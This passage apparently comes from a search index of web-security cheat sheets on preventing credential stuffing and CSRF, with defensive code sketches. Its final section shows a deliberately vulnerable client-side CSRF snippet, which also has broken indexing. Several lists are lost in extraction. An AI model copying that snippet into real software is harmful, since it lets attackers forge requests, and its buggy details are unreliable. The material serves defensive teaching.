"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html","title":"Credential Stuffing Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet covers defences against two common types of authentication-related attacks: credential stuffing and password spraying. Although these are separate, distinct attacks, in many cases the defences that would be implemented to protect against them are the same, and they would also be effective at protecting against brute-force attacks. A summary of these different attacks is listed below:

Attack Type Description Brute Force Testing multiple passwords from dictionary or other source against a single account. Credential Stuffing Testing username/password pairs obtained from the breach of another site. Password Spraying Testing a single weak password against a large number of different accounts."},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

In order to balance security and usability, multi-factor authentication can be combined with other techniques to require the second factor only in specific circumstances where there is reason to suspect that the login attempt may not be legitimate, such as a login from:

Additionally, for enterprise applications, known trusted IP ranges could be added to an allow list so that MFA is not required when users connect from these ranges.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#alternative-defenses","title":"Alternative Defenses","text":"

Where it is not possible to implement MFA, there are many alternative defenses that can be used to protect against credential stuffing and password spraying. In isolation none of these are as effective as MFA, however if multiple defenses are implemented in a layered approach, they can provide a reasonable degree of protection. In many cases, these mechanisms will also protect against brute-force or password spraying attacks.

Where an application has multiple user roles, it may be appropriate to implement different defenses for different roles. For example, it may not be feasible to enforce MFA for all users, but it should be possible to require that all administrators use it.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#secondary-passwords-pins-and-security-questions","title":"Secondary Passwords, PINs and Security Questions","text":"

As well as requiring a user to enter their password when authenticating, they can also be prompted to provide additional security information such as:

It must be emphasised that this does not constitute multi-factor authentication (as both factors are the same - something you know). However, it can still provide a useful layer of protection against both credential stuffing and password spraying where proper MFA can't be implemented.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate.

To improve usability, it may be desirable to only require the user to solve a CAPTCHA when the login request is considered suspicious, using the same criteria discussed above.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#ip-block-listing","title":"IP Block-listing","text":"

Less sophisticated attacks will often use a relatively small number of IP addresses, which can be block-listed after a number of failed login attempts. These failures should be tracked separately to the per-user failures, which are intended to protect against brute-force attacks. The block list should be temporary, in order to reduce the likelihood of permanently blocking legitimate users.
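
As a minimal sketch (assuming an in-memory store; the thresholds are hypothetical), temporary block-listing based on per-IP failure counts could look like this:

const ipFailures = new Map(); // ip -> { count, blockedUntil }\nconst MAX_FAILURES = 20; // hypothetical threshold, tracked separately from per-user lockout counters\nconst BLOCK_MINUTES = 15; // temporary block, to avoid permanently locking out legitimate users\n\nfunction isBlocked(ip) {\nconst entry = ipFailures.get(ip);\nreturn !!entry && entry.blockedUntil > Date.now();\n}\n\nfunction recordFailedLogin(ip) {\nconst entry = ipFailures.get(ip) || { count: 0, blockedUntil: 0 };\nentry.count++;\nif (entry.count >= MAX_FAILURES) {\nentry.blockedUntil = Date.now() + BLOCK_MINUTES * 60 * 1000;\nentry.count = 0; // reset the counter once the temporary block is applied\n}\nipFailures.set(ip, entry);\n}\n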

Additionally, there are publicly available block lists of known bad IP addresses which are collected by websites such as AbuseIPDB based on abuse reports from users.

Consider storing the last IP address which successfully logged in to each account, and if this IP address is added to a block list, then taking appropriate action such as locking the account and notifying the user, as it is likely that their account has been compromised.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#device-fingerprinting","title":"Device Fingerprinting","text":"

Aside from the IP address, there are a number of different factors that can be used to attempt to fingerprint a device. Some of these can be obtained passively by the server from the HTTP headers (particularly the \"User-Agent\" header), including:

Using JavaScript it is possible to access far more information, such as:

Using these various attributes, it is possible to create a fingerprint of the device. This fingerprint can then be matched against any browser attempting to login to the account, and if it doesn't match then the user can be prompted for additional authentication. Many users will have multiple devices or browsers that they use, so it is not practical to block attempts that do not match the existing fingerprints.
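
A minimal sketch of passive, server-side fingerprinting from request headers (the particular headers chosen here are illustrative, not a recommendation):

const crypto = require('crypto');\n\n// Derive a coarse device fingerprint from headers the server receives passively.\nfunction headerFingerprint(req) {\nconst parts = [\nreq.headers['user-agent'] || '',\nreq.headers['accept-language'] || '',\nreq.headers['accept-encoding'] || ''\n];\nreturn crypto.createHash('sha256').update(parts.join('|')).digest('hex');\n}\n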

The fingerprintjs2 JavaScript library can be used to carry out client-side fingerprinting.

It should be noted that as all this information is provided by the client, it can potentially be spoofed by an attacker. In some cases spoofing these attributes is trivial (such as the \"User-Agent\" header), but in other cases it may be more difficult to modify them.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-unpredictable-usernames","title":"Require Unpredictable Usernames","text":"

Credential stuffing attacks rely on not just the re-use of passwords between multiple sites, but also the re-use of usernames. A significant number of websites use the email address as the username, and as most users will have a single email address they use for all their accounts, this makes the combination of an email address and password very effective for credential stuffing attacks.

Requiring users to create their own username when registering on the website makes it harder for an attacker to obtain valid username and password pairs for credential stuffing, as many of the available credential lists only include email addresses. Providing the user with a generated username can provide a higher degree of protection (as users are likely to choose the same username on most websites), but is user unfriendly. Additionally, care needs to be taken to ensure that the generated username is not predictable (such as being based on the user's full name, or sequential numeric IDs), as this could make enumerating valid usernames for a password spraying attack easier.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

The following mechanisms are not sufficient to prevent credential stuffing or password spraying attacks; however they can be used to make the attacks more time consuming or technically difficult to implement. This can be useful to defend against opportunistic attackers, who use off-the-shelf tools and are likely to be discouraged by any technical barriers, but will not be sufficient against a more targeted attack.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-step-login-processes","title":"Multi-Step Login Processes","text":"

The majority of off-the-shelf tools are designed for a single step login process, where the credentials are POSTed to the server, and the response indicates whether or not the login attempt was successful. By adding additional steps to this process, such as requiring the username and password to be entered sequentially, or requiring that the user first obtains a random CSRF Token before they can login, this makes the attack slightly more difficult to perform, and doubles the number of requests that the attacker must make.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-javascript-and-block-headless-browsers","title":"Require JavaScript and Block Headless Browsers","text":"

Most tools used for these types of attacks will make direct POST requests to the server and read the responses, but will not download or execute JavaScript that was contained in them. By requiring the attacker to evaluate JavaScript in the response (for example to generate a valid token that must be submitted with the request), this forces the attacker to either use a real browser with an automation framework like Selenium or Headless Chrome, or to implement JavaScript parsing with another tool such as PhantomJS. Additionally, there are a number of techniques that can be used to identify Headless Chrome or PhantomJS.

Please note that blocking visitors who have JavaScript disabled will reduce the accessibility of the website, especially to visitors who use screen readers. In certain jurisdictions this may be in breach of equalities legislation.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#identifying-leaked-passwords","title":"Identifying Leaked Passwords","text":"

When a user sets a new password on the application, as well as checking it against a list of known weak passwords, it can also be checked against passwords that have previously been breached. The most well known public service for this is Pwned Passwords. You can host a copy of the application yourself, or use the API.

In order to protect the value of the source password being searched for, Pwned Passwords implements a k-Anonymity model that allows a password to be searched for by partial hash. This allows the first 5 characters of a SHA-1 password hash to be passed to the API.
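
A minimal sketch of the k-Anonymity lookup against the public range endpoint (assuming a Node.js runtime where fetch is available globally):

const crypto = require('crypto');\n\n// Returns true if the password appears in the Pwned Passwords corpus.\nasync function isPwnedPassword(password) {\nconst sha1 = crypto.createHash('sha1').update(password).digest('hex').toUpperCase();\nconst prefix = sha1.slice(0, 5); // only the first 5 characters of the hash are sent to the API\nconst suffix = sha1.slice(5);\nconst res = await fetch('https://api.pwnedpasswords.com/range/' + prefix);\nconst body = await res.text(); // each line of the response is SUFFIX:COUNT\nreturn body.includes(suffix + ':');\n}\n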

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#notify-users-about-unusual-security-events","title":"Notify users about unusual security events","text":"

When suspicious or unusual activity is detected, it may be appropriate to notify or warn the user. However, care should be taken that the user does not get overwhelmed with a large number of notifications that are not important to them, or they will just start to ignore or delete them.

For example, it would generally not be appropriate to notify a user that there had been an attempt to login to their account with an incorrect password. However, if there had been a login with the correct password, but which had then failed the subsequent MFA check, the user should be notified so that they can change their password.

Details related to current or recent logins should also be made visible to the user. For example, when they login to the application, the date, time and location of their previous login attempt could be displayed to them. Additionally, if the application supports concurrent sessions, the user should be able to view a list of all active sessions, and to terminate any other sessions that are not legitimate.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Cross-Site Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated. A CSRF attack works because browser requests automatically include all cookies including session cookies. Therefore, if the user is authenticated to the site, the site cannot distinguish between legitimate authorized requests and forged authenticated requests. This attack is thwarted when proper Authorization is used, which implies that a challenge-response mechanism is required that verifies the identity and authority of the requester.

The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and privileges of the user. For example, this attack could result in a transfer of funds, changing a password, or making a purchase with the user's credentials. In effect, CSRF attacks are used by an attacker to make a target system perform a function via the victim's browser, without the victim's knowledge, at least until the unauthorized transaction has been committed.

In short, the following principles should be followed to defend against CSRF:

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#token-based-mitigation","title":"Token Based Mitigation","text":"

The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#use-built-in-or-existing-csrf-implementations-for-csrf-protection","title":"Use Built-In Or Existing CSRF Implementations for CSRF Protection","text":"

Synchronizer token defenses have been built into many frameworks. It is strongly recommended to research if the framework you are using has an option to achieve CSRF protection by default before trying to build your custom token generating system. For example, .NET has built-in protection that adds a token to CSRF vulnerable resources. You are responsible for proper configuration (such as key management and token management) before using these built-in CSRF protections that generate tokens to guard CSRF vulnerable resources.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern","title":"Synchronizer Token Pattern","text":"

CSRF tokens should be generated on the server-side. They can be generated once per user session or for each request. Per-request tokens are more secure than per-session tokens as the time range for an attacker to exploit the stolen tokens is minimal. However, this may result in usability concerns. For example, the \"Back\" button browser capability is often hindered as the previous page may contain a token that is no longer valid. Interaction with this previous page will result in a CSRF false positive security event on the server. In per-session token implementations after the initial generation of a token, the value is stored in the session and is used for each subsequent request until the session expires.

When a request is issued by the client, the server-side component must verify the existence and validity of the token in the request compared to the token found in the user session. If the token was not found within the request, or the value provided does not match the value within the user session, then the request should be rejected. Additional actions such as logging the event as a potential CSRF attack in progress should also be considered.

CSRF tokens should be:

CSRF tokens prevent CSRF because without a token, an attacker cannot create valid requests to the backend server.

For the Synchronised Token Pattern, CSRF tokens should not be transmitted using cookies.

The CSRF token can be transmitted to the client as part of a response payload, such as a HTML or JSON response. It can then be transmitted back to the server as a hidden field on a form submission, or via an AJAX request as a custom header value or part of a JSON payload. Make sure that the token is not leaked in the server logs, or in the URL. CSRF tokens in GET requests are potentially leaked at several locations, such as the browser history, log files, network utilities that log the first line of a HTTP request, and Referer headers if the protected site links to an external site.

For example:

<form action=\"/transfer.do\" method=\"post\">\n<input type=\"hidden\" name=\"CSRFToken\" value=\"OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZMGYwMGEwOA==\">\n[...]\n</form>\n

Inserting the CSRF token in a custom HTTP request header via JavaScript is considered more secure than adding the token in the hidden field form parameter because requests with custom headers are automatically subject to the same-origin policy.
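
For illustration (the X-CSRF-Token header name and the meta tag are placeholders, not a prescribed convention; /transfer.do matches the form example above), the token could be sent with an AJAX request like this:

// Read the token previously embedded in the page by the server, e.g. in a meta tag.\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\nfetch(\"/transfer.do\", {\nmethod: \"POST\",\nheaders: {\n\"Content-Type\": \"application/json\",\n\"X-CSRF-Token\": csrf_token // custom header value checked by the server against the session token\n},\nbody: JSON.stringify({ amount: 100 })\n}).then(response => { /* [...] */ });\n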

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie","title":"Double Submit Cookie","text":"

If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless. There are different ways to implement this technique, where the naive pattern is the most commonly used variation.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#naive-double-submit-cookie","title":"Naive Double Submit Cookie","text":"

The Naive Double Submit Cookie is a scalable and easy-to-implement technique where we send a random value in both a cookie and as a request parameter, with the server verifying if the cookie value and request value match. When a user visits (even before authenticating, to prevent login CSRF), the site should generate an (ideally cryptographically strong) random value and set it as a cookie on the user's machine, separate from the session identifier. The site then requires that every transaction request includes this random value as a hidden form value or in the request header. If both of them match on the server side, the server accepts the request as legitimate; if they don't, the request is rejected.

In a nutshell, an attacker is unable to access the cookie value during a cross-site request. This prevents them from including a matching value in the hidden form value or as a request parameter/header.
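
A minimal server-side sketch of the naive pattern (assuming an Express-style application with the cookie-parser middleware; the cookie, field, and header names are illustrative):

const crypto = require('crypto');\n\n// On first visit: set the random value as a cookie, separate from the session identifier.\nfunction issueCsrfCookie(res) {\nconst value = crypto.randomBytes(32).toString('hex'); // ideally cryptographically strong\nres.cookie('csrf_cookie', value, { secure: true, sameSite: 'lax' });\nreturn value; // also embed this value in forms or expose it to client-side code\n}\n\n// On every state-changing request: compare the cookie with the submitted value.\nfunction verifyCsrf(req, res, next) {\nconst fromCookie = req.cookies['csrf_cookie'];\nconst fromRequest = req.body.csrf_token || req.get('X-CSRF-Token');\nif (!fromCookie || fromCookie !== fromRequest) {\nreturn res.status(403).send('CSRF validation failed');\n}\nnext();\n}\n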

The Naive Double Submit Cookie method is a good initial step to counter CSRF attacks, but it remains vulnerable to certain attacks. This resource provides more information on some vulnerabilities. It is therefore recommended to use a more secure implementation, the Signed Double Submit Cookie pattern.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#signed-double-submit-cookie","title":"Signed Double Submit Cookie","text":"

The Signed Double Submit Cookie involves a secret key known only to the server. This ensures that an attacker cannot create and inject their own, known, CSRF token into the victim's authenticated session. Tokens can be secured by hashing or encrypting them, with the HMAC algorithm being a popular choice due to its speed and ease of implementation.

In both cases, it is recommended to bind the CSRF token to the user's current session to even further enhance security.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#hmac-csrf-token","title":"HMAC CSRF Token","text":"

A simpler alternative to an encrypted CSRF cookie is to use HMAC (Hash-based Message Authentication Code) to hash the random value with a secret key known only by the server and place this value in a cookie. This is similar to an encrypted cookie (both require knowledge only the server holds), but is less computationally intensive than encrypting and decrypting the cookie.

We recommend generating the HMAC CSRF Token, with a session-dependent user value, using the following steps:

Below is an example in pseudo-code that demonstrates the implementation steps described above:

// Gather the values\nsecret = readEnvironmentVariable(\"CSRF_SECRET\") // HMAC secret key\nsessionID = session.sessionID // Current authenticated user session\nrandomValue = cryptographic.randomValue() // Cryptographic random value\n\n// Create the CSRF Token\nmessage = sessionID + \"!\" + randomValue // HMAC message payload\nhmac = hmac(\"SHA256\", secret, message) // Generate the HMAC hash\ncsrfToken = hmac + \".\" + message // Combine HMAC hash with message to generate the token. The plain message is required to later authenticate it against its HMAC hash\n\n// Store the CSRF Token in a cookie\nresponse.setCookie(\"csrf_token=\" + csrfToken + \"; Secure\") // Set Cookie without HttpOnly flag\n
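
For completeness, a pseudo-code sketch (in the same style as above) of validating such a token when a request arrives; constantTimeEquals is a placeholder for a constant-time string comparison:

// Gather the values\nsecret = readEnvironmentVariable(\"CSRF_SECRET\") // Same HMAC secret key used during generation\nsessionID = session.sessionID // Current authenticated user session\ncsrfToken = request.getParameter(\"csrf_token\") // Token submitted with the request (form field or header)\n\n// Split the token back into its HMAC hash and message parts\nreceivedHmac = csrfToken.split(\".\")[0]\nmessage = csrfToken.substring(csrfToken.indexOf(\".\") + 1)\n\n// Recompute the HMAC and verify the session binding\nexpectedHmac = hmac(\"SHA256\", secret, message)\nif (!constantTimeEquals(receivedHmac, expectedHmac) || !message.startsWith(sessionID + \"!\")) {\nrejectRequest()\n}\n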

Should Timestamps be Included in CSRF Tokens for Expiration? It's a common misconception to include timestamps as a value to specify the CSRF token expiration time. A CSRF Token is not an access token. They are used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token (1).

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-request-headers","title":"Custom Request Headers","text":"

Both the synchronizer token and the double submit cookie are used to prevent forgery of form data, but they can be tricky to implement and degrade usability. Many modern web applications do not use <form> tags. A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header. No token is needed for this approach.

In this pattern, the client appends a custom header to requests that require CSRF protection. The header can be any arbitrary key-value pair, as long as it does not conflict with existing headers.

X-YOURSITE-CSRF-PROTECTION=1\n

When handling the request, the API checks for the existence of this header. If the header does not exist, the backend rejects the request as potential forgery. This approach has several advantages:

If you use <form> tags anywhere in your client, you will still need to protect them with alternate approaches described in this document such as tokens.

This defense relies on the browser's same-origin policy (SOP) restriction that only JavaScript can be used to add a custom header, and only within its origin. By default, browsers do not allow JavaScript to make cross origin requests with custom headers. Only JavaScript that you serve from your origin can add these headers.
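
A sketch of the server-side check (Express-style middleware; the header name matches the illustrative one above):

// Reject state-changing requests that lack the custom header.\nfunction requireCsrfHeader(req, res, next) {\nconst safeMethods = ['GET', 'HEAD', 'OPTIONS'];\nif (!safeMethods.includes(req.method) && req.get('X-YOURSITE-CSRF-PROTECTION') !== '1') {\nreturn res.status(403).send('Potential CSRF: missing custom header');\n}\nnext();\n}\n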

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-headers-and-cors","title":"Custom Headers and CORS","text":"

Cookies are not set on cross-origin requests (CORS) by default. To enable cookies on an API, you will set Access-Control-Allow-Credentials=true. The browser will reject any response that includes Access-Control-Allow-Origin=* if credentials are allowed. To allow CORS requests, but protect against CSRF, you need to make sure the server only whitelists a few select origins that you definitively control via the Access-Control-Allow-Origin header. Any cross-origin request from an allowed domain will be able to set custom headers.

As an example, you might configure your backend to allow CORS with cookies from http://www.yoursite.com and http://mobile.yoursite.com, so that the only possible preflight responses are:

Access-Control-Allow-Origin=http://mobile.yoursite.com\nAccess-Control-Allow-Credentials=true\n

or

Access-Control-Allow-Origin=http://www.yoursite.com\nAccess-Control-Allow-Credentials=true\n

A less secure configuration would be to configure your backend server to allow CORS from all subdomains of your site using a regular expression. If an attacker is able to take over a subdomain (not uncommon with cloud services) your CORS configuration would allow them to bypass the same origin policy and forge a request with your custom header.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#defense-in-depth-techniques","title":"Defense In Depth Techniques","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attribute","title":"SameSite Cookie Attribute","text":"

SameSite is a cookie attribute (similar to HTTPOnly, Secure etc.) which aims to mitigate CSRF attacks. It is defined in RFC6265bis. This attribute helps the browser decide whether to send cookies along with cross-site requests. Possible values for this attribute are Lax, Strict, or None.

The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will not receive the session cookie and the user will not be able to access the project. A bank website however doesn't want to allow any transactional pages to be linked from external sites, so the Strict flag would be most appropriate.

The default Lax value provides a reasonable balance between security and usability for websites that want to maintain the user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods such as POST. The only cross-site requests allowed in Lax mode are top-level navigations that use safe HTTP methods.

For more details on the SameSite values, check the following section from the rfc.

Example of cookies using this attribute:

Set-Cookie: JSESSIONID=xxxxx; SameSite=Strict\nSet-Cookie: JSESSIONID=xxxxx; SameSite=Lax\n

All desktop browsers and almost all mobile browsers now support the SameSite attribute. To keep track of the browsers implementing it and the usage of the attribute, refer to the following service. Note that Chrome has announced that they will mark cookies as SameSite=Lax by default from Chrome 80 (due in February 2020), and Firefox and Edge are both planning to follow suit. Additionally, the Secure flag will be required for cookies that are marked as SameSite=None.

It is important to note that this attribute should be implemented as an additional layer of a defense in depth concept. It protects the user only on browsers that support it, and there are two ways to bypass it, as mentioned in the following section. This attribute should not replace a CSRF token. Instead, it should co-exist with that token in order to protect the user in a more robust way.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers","title":"Verifying Origin With Standard Headers","text":"

There are two steps to this mitigation, both of which rely on examining an HTTP request header value.

  1. Determining the origin the request is coming from (source origin). Can be done via Origin or Referer headers.
  2. Determining the origin the request is going to (target origin).

On the server side, we verify whether both of them match. If they do, we accept the request as legitimate (meaning it's a same-origin request), and if they don't, we discard the request (meaning that the request originated cross-domain). The reliability of these headers comes from the fact that they cannot be altered programmatically, as they fall under the forbidden headers list, meaning that only the browser can set them.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-source-origin-via-originreferer-header","title":"Identifying Source Origin (via Origin/Referer header)","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-origin-header","title":"Checking the Origin Header","text":"

If the Origin header is present, verify that its value matches the target origin. Unlike the Referer, the Origin header will be present in HTTP requests that originate from an HTTPS URL.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-referer-header","title":"Checking the Referer Header","text":"

If the Origin header is not present, verify the hostname in the Referer header matches the target origin. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state, which is required to keep track of a synchronization token.

In both cases, make sure the target origin check is strong. For example, if your site is example.org, make sure example.org.attacker.com does not pass your origin check (i.e., match through the trailing / after the origin to make sure you are matching against the entire origin).

If neither of these headers are present, you can either accept or block the request. We recommend blocking. Alternatively, you might want to log all such instances, monitor their use cases/behavior, and then start blocking requests only after you get enough confidence.
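
A sketch of this check (Express/Node-style; the target origin is a placeholder, and blocking is the default when neither header is present):

const TARGET_ORIGIN = 'https://example.org'; // placeholder: see the next section on determining this reliably\n\nfunction verifySourceOrigin(req, res, next) {\nlet source = null;\nif (req.get('Origin')) {\nsource = req.get('Origin');\n} else if (req.get('Referer')) {\nsource = new URL(req.get('Referer')).origin; // reduce the full Referer URL to its origin\n}\n// Compare the entire origin so that https://example.org.attacker.com does not pass.\nif (source !== TARGET_ORIGIN) {\nreturn res.status(403).send('Source origin does not match target origin');\n}\nnext();\n}\n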

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-the-target-origin","title":"Identifying the Target Origin","text":"

You might think it's easy to determine the target origin, but it's frequently not. The first thought is to simply grab the target origin (i.e., its hostname and port #) from the URL in the request. However, the application server is frequently sitting behind one or more proxies and the original URL is different from the URL the app server actually receives. If your application server is directly accessed by its users, then using the origin in the URL is fine and you're all set.

If you are behind a proxy, there are a number of options to consider.

This mitigation works properly when the Origin or Referer headers are present in the requests. Though these headers are included the majority of the time, there are a few use cases where they are not included (most of them for legitimate reasons, such as safeguarding user privacy or accommodating the browser ecosystem). The following lists some use cases:

Usually, only a minor percentage of traffic (1-2%) falls under the above categories, and no enterprise would want to lose this traffic. One popular technique used across the Internet to make this approach more usable is to accept the request if the Origin/Referer matches your configured list of domains OR a null value (examples here; the null value is to cover the edge cases mentioned above where these headers are not sent). Please note that attackers can exploit this, but people prefer to use this technique as a defense in depth measure because of the minor effort involved in deploying it.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#cookie-with-__host-prefix","title":"Cookie with __Host- prefix","text":"

Another solution for this problem is use of Cookie Prefixes for cookie with CSRF token. If cookie has __Host- prefix e.g. Set-Cookie: __Host-token=RANDOM; path=/; Secure then the cookie:

As of July 2020 cookie prefixes are supported by all major browsers except Internet Explorer.

See the Mozilla Developer Network and IETF Draft for further information about cookie prefixes.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#user-interaction-based-csrf-defense","title":"User Interaction Based CSRF Defense","text":"

While all the techniques referenced here do not require any user interaction, sometimes it's easier or more appropriate to involve the user in the transaction to prevent unauthorized operations (forged via CSRF or otherwise). The following are some examples of techniques that can act as strong CSRF defense when implemented correctly.

While these are a very strong CSRF defense, they can create a significant impact on the user experience. As such, they would generally only be used for security critical operations (such as password change, money transfers, etc.), alongside the other defences discussed in this cheat sheet.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#login-csrf","title":"Login CSRF","text":"

Most developers tend to ignore CSRF vulnerabilities on login forms, assuming that CSRF is not applicable there because the user is not authenticated at that stage; however, this assumption is not always true. CSRF vulnerabilities can still occur on login forms where the user is not authenticated, but the impact and risk are different.

For example, if an attacker uses CSRF to assume an authenticated identity of a target victim on a shopping website using the attacker's account, and the victim then enters their credit card information, an attacker may be able to purchase items using the victim's stored card details. For more information about login CSRF and other risks, see section 3 of this paper.

Login CSRF can be mitigated by creating pre-sessions (sessions before a user is authenticated) and including tokens in login form. You can use any of the techniques mentioned above to generate tokens. Remember that pre-sessions cannot be transitioned to real sessions once the user is authenticated - the session should be destroyed and a new one should be made to avoid session fixation attacks. This technique is described in Robust Defenses for Cross-Site Request Forgery section 4.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf","title":"Client-side CSRF","text":"

Client-side CSRF is a new variant of CSRF attacks where the attacker tricks the client-side JavaScript code to send a forged HTTP request to a vulnerable target site by manipulating the program\u2019s input parameters. Client-side CSRF originates when the JavaScript program uses attacker-controlled inputs, such as the URL, for the generation of asynchronous HTTP requests.

Note: These variants of CSRF are particularly important as they can bypass some of the common anti-CSRF countermeasures like token-based mitigations and SameSite cookies. For example, when synchronizer tokens or custom HTTP request headers are used, the JavaScript program will include them in the asynchronous requests. Also, web browsers will include cookies in same-site request contexts initiated by JavaScript programs, circumventing the SameSite cookie policies.

Client-side vs. Classical CSRF: In the classical CSRF model, the vulnerable component is the server-side program, which cannot distinguish whether the incoming authenticated request was performed intentionally, also known as the confused deputy problem. In the client-side CSRF model, the vulnerable component is the client-side JavaScript program instead, which allows an attacker to generate arbitrary asynchronous requests, e.g., by manipulating the request endpoint and/or its parameters. Client-side CSRF is an input validation problem that, when exploited, reintroduces the confused deputy flaw; that is, the server side will again be unable to distinguish whether the request was performed intentionally or not.

For more information about client-side CSRF vulnerabilities, see Sections 2 and 5 of this paper, the CSRF chapter of the SameSite wiki, and this post by the Facebook Whitehat program.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-example","title":"Client-side CSRF Example","text":"

The following code snippet demonstrates a simple example of a client-side CSRF vulnerability.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction ajaxLoad(){\n// process the URL hash fragment\nlet hash_fragment = window.location.hash.slice(1);  // hash fragment should be of the format: /^(get|post);(.*)$/\n// e.g., https://site.com/index/#post;/profile\nif(hash_fragment.length > 0 && hash_fragment.indexOf(';') > 0 ){\n\nlet params = hash_fragment.match(/^(get|post);(.*)$/);\nif(params && params.length){\nlet request_method = params[1];   let request_endpoint = params[3];\n\nfetch(request_endpoint, {\nmethod: request_method,\nheaders: {\n'XSRF-TOKEN': csrf_token,\n// [...]\n},\n// [...]\n}).then(response => { /* [...] */ }); }\n}\n}\n// trigger the async request on page load\nwindow.onload = ajaxLoad();\n</script>\n

Vulnerability: In this snippet, the program invokes a function ajaxLoad() upon the page load, which is responsible for loading various webpage elements. The function reads the value of the URL hash fragment (line 4), and extracts two pieces of information from it (i.e., request method and endpoint) to generate an asynchronous HTTP request (lines 11-13). The vulnerability occurs in lines 15-22, when the JavaScript program uses URL fragments to obtain the server-side endpoint for the asynchronous HTTP request (line 15) and the request method. However, both inputs can be controlled by web attackers, who can pick the value of their choosing, and craft a malicious URL containing the attack payload.

